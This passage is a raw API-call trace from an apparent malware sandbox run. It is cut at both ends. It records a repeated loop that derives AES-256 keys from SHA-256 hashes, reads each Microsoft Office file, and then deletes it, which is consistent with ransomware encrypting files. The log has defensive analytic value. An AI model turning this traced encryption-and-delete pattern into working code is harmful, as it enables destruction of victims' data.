office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttoolseticonimages.jpg")) returned 1 [0171.703] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.704] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.704] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.704] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.704] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2338 [0171.704] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.707] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.707] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.707] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.709] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectToolsetIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttoolseticonimagesmask.bmp")) returned 1 [0171.712] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.713] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.713] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.713] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.713] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5f00 [0171.713] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.725] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.725] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.726] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.727] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\SplashImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\splashimage.jpg")) returned 1 [0171.729] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.730] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.730] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.730] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.730] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x14078 [0171.730] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.750] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.750] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.750] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.751] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\SplashImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\splashimagemask.bmp")) returned 1 [0171.753] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.754] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.754] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.754] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.754] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4d72 [0171.754] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.769] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.769] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.769] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.770] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\WhiteboxMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\whiteboxmask.bmp")) returned 1 [0171.772] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.773] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.773] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.773] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.773] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc59 [0171.773] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.781] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.781] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.781] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.783] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ZoomIcons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\zoomicons.jpg")) returned 1 [0171.789] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.790] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.790] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.790] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.790] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x638 [0171.790] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.801] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.801] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.801] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.802] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ZoomIconsMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\zoomiconsmask.bmp")) returned 1 [0171.804] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0171.816] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.817] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.817] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.817] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.817] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10f3 [0171.817] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.820] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.820] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.820] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.821] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\IconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\welcome tool\\iconimages.jpg")) returned 1 [0171.822] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0171.823] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0171.823] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.823] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0171.823] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa38 [0171.823] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0171.833] CryptDestroyHash (hHash=0x284d728) returned 1 [0171.833] CryptDestroyKey (hKey=0x284d668) returned 1 [0171.833] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.835] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\IconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\welcome tool\\iconimagesmask.bmp")) returned 1 [0171.847] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0171.860] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0171.861] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0171.861] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0171.861] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.861] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0171.861] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x14a [0171.862] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0171.864] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0171.864] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0171.864] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.865] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Messenger.xml" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\messenger.xml")) returned 1 [0171.868] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0171.869] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0171.869] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0171.869] CryptHashData (hHash=0x284d628, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.869] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0171.870] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x17e2d [0171.870] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0171.900] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.900] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0171.900] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.902] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterApplicationDescriptors.xml" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\starterapplicationdescriptors.xml")) returned 1 [0171.904] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0171.905] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0171.905] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.905] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0171.905] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1b875 [0171.905] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0171.923] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0171.923] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0171.923] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.925] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterNotificationDescriptors.xml" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\starternotificationdescriptors.xml")) returned 1 [0171.928] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0171.929] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0171.929] CryptHashData (hHash=0x284d628, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0171.929] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0171.929] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1a553 [0171.929] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0171.949] CryptDestroyHash (hHash=0x284d628) returned 1 [0171.949] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0171.949] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0171.951] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterToolTemplates.xml" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\startertooltemplates.xml")) returned 1 [0171.970] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.006] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.009] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.025] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0172.026] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0172.026] CryptHashData (hHash=0x284d5e8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0172.026] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0172.026] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3dddf [0172.026] ReadFile (in: hFile=0x4a8, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0172.057] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0172.057] CryptDestroyKey (hKey=0x284d628) returned 1 [0172.057] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0172.058] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12\\Microsoft.Office.InfoPath.xml" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomformservices\\infopathomformservicesv12\\microsoft.office.infopath.xml")) returned 1 [0172.062] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0172.062] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0172.062] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0172.063] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0172.136] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3dddf [0172.136] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0172.170] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0172.170] CryptDestroyKey (hKey=0x284d668) returned 1 [0172.170] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0172.171] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\Microsoft.Office.InfoPath.xml" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomformservices\\microsoft.office.infopath.xml")) returned 1 [0172.175] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.177] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0172.178] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0172.178] CryptHashData (hHash=0x284d628, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0172.178] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0172.178] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3dddf [0172.178] ReadFile (in: hFile=0x4e8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0172.222] CryptDestroyHash (hHash=0x284d628) returned 1 [0172.222] CryptDestroyKey (hKey=0x284d668) returned 1 [0172.222] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0172.223] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\Microsoft.Office.InfoPath.xml" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomv12\\microsoft.office.infopath.xml")) returned 1 [0172.225] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0172.226] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0172.226] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0172.226] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0172.226] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3dddf [0172.226] ReadFile (in: hFile=0x494, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0172.253] CryptDestroyHash (hHash=0x284d568) returned 1 [0172.253] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0172.253] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0172.254] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\Microsoft.Office.InfoPath.xml" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\microsoft.office.infopath.xml")) returned 1 [0172.257] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.266] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.267] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.284] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0172.316] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0172.317] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0172.317] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0172.317] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d668) returned 1 [0172.317] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5a768 [0172.317] ReadFile (in: hFile=0x4ac, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0172.352] CryptDestroyHash (hHash=0x284d528) returned 1 [0172.352] CryptDestroyKey (hKey=0x284d668) returned 1 [0172.352] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0172.353] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.BusinessData.xml" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.businessdata.xml")) returned 1 [0172.357] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0172.358] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0172.358] CryptHashData (hHash=0x284d5a8, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0172.358] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d668) returned 1 [0172.358] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x295c [0172.358] ReadFile (in: hFile=0x4c8, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0172.365] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0172.365] 